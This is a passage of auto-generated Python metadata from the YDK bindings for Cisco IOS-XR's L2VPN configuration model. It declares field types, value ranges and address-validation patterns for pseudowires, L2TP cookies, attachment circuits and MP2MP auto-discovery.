_MetaInfoClassMember('backup-pseudowire', REFERENCE_LIST, 'BackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire',
[], [],
''' Backup pseudowire for the cross connect
''',
'backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher remote cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower remote cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Remote cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-remote-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-secondary-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes',
False,
[
_MetaInfoClassMember('l2tp-local-cookie', REFERENCE_CLASS, 'L2TpLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie',
[], [],
''' L2TP local cookie
''',
'l2tp_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-local-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP local session ID
''',
'l2tp_local_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-cookie', REFERENCE_CLASS, 'L2TpRemoteCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie',
[], [],
''' L2TP remote cookie
''',
'l2tp_remote_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP remote session ID
''',
'l2tp_remote_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-secondary-local-cookie', REFERENCE_CLASS, 'L2TpSecondaryLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
[], [],
''' L2TP secondary local cookie
''',
'l2tp_secondary_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static-attributes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire L2TPv3 static
configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress',
False,
[
_MetaInfoClassMember('pseudowire-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Pseudowire IPv6 address. A pseudowire
can have only one address: IPv4 or IPv6
''',
'pseudowire_address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-pseudowires', REFERENCE_CLASS, 'BackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires',
[], [],
''' List of pseudowires
''',
'backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bandwidth', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Pseudowire Bandwidth
''',
'bandwidth',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static', REFERENCE_CLASS, 'L2TpStatic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic',
[], [],
''' Pseudowire L2TPv3 static configuration
''',
'l2tp_static',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static-attributes', REFERENCE_CLASS, 'L2TpStaticAttributes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes',
[], [],
''' L2TP Static Attributes
''',
'l2tp_static_attributes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-static-labels', REFERENCE_CLASS, 'MplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels',
[], [],
''' MPLS static labels
''',
'mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', REFERENCE_UNION, 'str' , None, None,
[], [],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False, [
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
]),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire',
False,
[
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('neighbor', REFERENCE_LIST, 'Neighbor' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor',
[], [],
''' keys: neighbor
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-address', REFERENCE_LIST, 'PseudowireAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress',
[], [],
''' keys: pseudowire-address
''',
'pseudowire_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires',
False,
[
_MetaInfoClassMember('pseudowire', REFERENCE_LIST, 'Pseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire',
[], [],
''' Pseudowire configuration
''',
'pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Name of the monitor session
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable monitor session segment
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'monitor-session',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions',
False,
[
_MetaInfoClassMember('monitor-session', REFERENCE_LIST, 'MonitorSession' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession',
[], [],
''' Monitor session segment
''',
'monitor_session',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'monitor-sessions',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Target AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('global-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Target Global ID
''',
'global_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('prefix', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Target Prefix
''',
'prefix',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('sacid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Source AC ID
''',
'sacid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-routed',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds',
False,
[
_MetaInfoClassMember('pseudowire-routed', REFERENCE_LIST, 'PseudowireRouted' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted',
[], [],
''' Pseudowire configuration
''',
'pseudowire_routed',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-routeds',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable attachment circuit interface
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits',
False,
[
_MetaInfoClassMember('attachment-circuit', REFERENCE_LIST, 'AttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit',
[], [],
''' Attachment circuit interface
''',
'attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 38)], [],
''' Name of the point to point xconnect
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('attachment-circuits', REFERENCE_CLASS, 'AttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits',
[], [],
''' List of attachment circuits
''',
'attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-attachment-circuits', REFERENCE_CLASS, 'BackupAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits',
[], [],
''' List of backup attachment circuits
''',
'backup_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interworking', REFERENCE_ENUM_CLASS, 'InterworkingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterworkingEnum',
[], [],
''' Interworking
''',
'interworking',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('monitor-sessions', REFERENCE_CLASS, 'MonitorSessions' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions',
[], [],
''' List of Monitor session segments
''',
'monitor_sessions',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('p2p-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' cross connect description Name
''',
'p2p_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-evpns', REFERENCE_CLASS, 'PseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns',
[], [],
''' List of EVPN Services
''',
'pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-routeds', REFERENCE_CLASS, 'PseudowireRouteds' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds',
[], [],
''' List of pseudowire-routed
''',
'pseudowire_routeds',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowires', REFERENCE_CLASS, 'Pseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires',
[], [],
''' List of pseudowires
''',
'pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'p2p-xconnect',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects',
False,
[
_MetaInfoClassMember('p2p-xconnect', REFERENCE_LIST, 'P2PXconnect' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect',
[], [],
''' Point to point xconnect
''',
'p2p_xconnect',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'p2p-xconnects',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router distinguisher type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy',
False,
[
_MetaInfoClassMember('export', ATTRIBUTE, 'str' , None, None,
[], [],
''' Export route policy
''',
'export',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('import', ATTRIBUTE, 'str' , None, None,
[], [],
''' Import route policy
''',
'import_',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-policy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
